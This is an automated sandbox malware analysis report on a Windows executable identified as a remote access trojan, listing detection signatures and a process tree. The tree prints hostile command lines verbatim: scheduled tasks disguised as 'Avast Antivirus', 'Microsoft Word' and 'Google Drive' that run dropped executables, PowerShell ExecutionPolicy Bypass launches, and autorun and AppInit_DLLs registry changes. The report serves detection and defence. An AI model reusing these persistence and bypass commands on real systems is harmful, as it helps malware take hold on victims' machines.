Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ptKNiAaGus.exe

Overview

General Information

Sample name:ptKNiAaGus.exe
Analysis ID:1466956
MD5:4410af8bec1266d76029f9bb042c6a73
SHA1:632a7eadf55f09d8ba0d9641ae1adaa921aaf5fa
SHA256:04783068a4bc4ce6a3f2e8ed35d40528b84ddb9c1a0ad2f39fb5634eb5f8295a
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allows loading of unsigned dll using appinit_dll
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops PE files to the user root directory
Drops large PE files
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64native
  • ptKNiAaGus.exe (PID: 8868 cmdline: "C:\Users\user\Desktop\ptKNiAaGus.exe" MD5: 4410AF8BEC1266D76029F9BB042C6A73)
    • WmiPrvSE.exe (PID: 6552 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 1332 cmdline: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 7408 cmdline: SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 9572 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • Conhost.exe (PID: 9628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 9636 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 9648 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 9760 cmdline: SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 9668 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9776 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • pto2q1ow.nf5.exe (PID: 10036 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe" MD5: D843D2F7E8D6DD8B1490C0EABA86F5CC)
          • cmd.exe (PID: 10220 cmdline: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 10232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • schtasks.exe (PID: 6988 cmdline: SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" MD5: 796B784E98008854C27F4B18D287BA30)
          • xdwdPutty.exe (PID: 10220 cmdline: C:\Users\user\xdwdPutty.exe MD5: 8BBEF39EBACCBCCEF26BE354545B98BD)
            • cmd.exe (PID: 7740 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • cmd.exe (PID: 1536 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • cmd.exe (PID: 6740 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
              • Conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • Conhost.exe (PID: 9228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • Conhost.exe (PID: 9764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • Conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1908 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 7712 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 8164 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 5076 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • z4wwumki.3zg.exe (PID: 6424 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe" MD5: D843D2F7E8D6DD8B1490C0EABA86F5CC)
          • cmd.exe (PID: 6236 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • schtasks.exe (PID: 8120 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
          • Conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7780 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 4676 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 6512 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • Conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 2780 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 8304 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 8416 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 8752 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 8960 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 8496 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 9636 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
        • Conhost.exe (PID: 9656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9684 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 9956 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 7224 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 7460 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • Conhost.exe (PID: 8304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • xdwdMicrosoft Paint.exe (PID: 9912 cmdline: "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" MD5: A4A43E58C3E256B89E9074B3485947F4)
    • cmd.exe (PID: 1076 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 4240 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • xdwdPutty.exe (PID: 2812 cmdline: "C:\Users\user\xdwdPutty.exe" MD5: 8BBEF39EBACCBCCEF26BE354545B98BD)
      • cmd.exe (PID: 2420 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 3216 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
          • Conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • Conhost.exe (PID: 9972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • xdwdMicrosoft Paint.exe (PID: 8500 cmdline: "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" MD5: A4A43E58C3E256B89E9074B3485947F4)
    • cmd.exe (PID: 8636 cmdline: "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 8784 cmdline: scHTaSks /Run /I /TN "Avast Antivirus" MD5: 796B784E98008854C27F4B18D287BA30)
  • xdwdPutty.exe (PID: 8872 cmdline: C:\Users\user\xdwdPutty.exe MD5: 8BBEF39EBACCBCCEF26BE354545B98BD)
    • cmd.exe (PID: 9116 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 5876 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
      • Conhost.exe (PID: 9180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • xdwdMicrosoft Paint.exe (PID: 9720 cmdline: "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" MD5: A4A43E58C3E256B89E9074B3485947F4)
    • cmd.exe (PID: 9268 cmdline: "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 9424 cmdline: scHTaSks /Run /I /TN "Avast Antivirus" MD5: 796B784E98008854C27F4B18D287BA30)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit, CommandLine: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ptKNiAaGus.exe", ParentImage: C:\Users\user\Desktop\ptKNiAaGus.exe, ParentProcessId: 8868, ParentProcessName: ptKNiAaGus.exe, ProcessCommandLine: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit, ProcessId: 1332, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit, CommandLine: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ptKNiAaGus.exe", ParentImage: C:\Users\user\Desktop\ptKNiAaGus.exe, ParentProcessId: 8868, ParentProcessName: ptKNiAaGus.exe, ProcessCommandLine: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit, ProcessId: 1332, ProcessName: cmd.exe
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9668, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' , ProcessId: 9776, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ptKNiAaGus.exe, ProcessId: 8868, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xdwdsystegregre
Sigma detected: CurrentVersion NT Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\xdwd.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ptKNiAaGus.exe, ProcessId: 8868, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
Sigma detected: Suspicious Schtasks From Env Var Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST , CommandLine: SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST , CommandLine|base64offset|contains: ISi", Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9648, ParentProcessName: cmd.exe, ProcessCommandLine: SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST , ProcessId: 9760, ProcessName: schtasks.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9668, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' , ProcessId: 9776, ProcessName: powershell.exe

Snort Signatures

Timestamp:07/03/24-15:50:29.602801
SID:2851746
Source Port:49740
Destination Port:44998
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:07/03/24-15:50:31.680170
SID:2851746
Source Port:49741
Destination Port:44998
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:07/03/24-15:50:36.268137
SID:2851746
Source Port:49745
Destination Port:44998
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exeAvira: detection malicious, Label: TR/Crypt.OPACK.Gen
Source: C:\Users\user\xdwdPutty.exeAvira: detection malicious, Label: TR/Crypt.OPACK.Gen
Multi AV Scanner detection for submitted file
Source: ptKNiAaGus.exeReversingLabs: Detection: 83%
Machine Learning detection for dropped file
Source: C:\Users\user\Videos\xdwdPutty.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: ptKNiAaGus.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49734 version: TLS 1.0
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49742 version: TLS 1.0
Source: ptKNiAaGus.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Malware\Desktop\hack tool\Backdoor\Sheet rat v 2.2\Src\Plugins\SendFile\obj\Release\SendFile.pdb source: ptKNiAaGus.exe, 00000000.00000002.3335122785.000000001BAD0000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
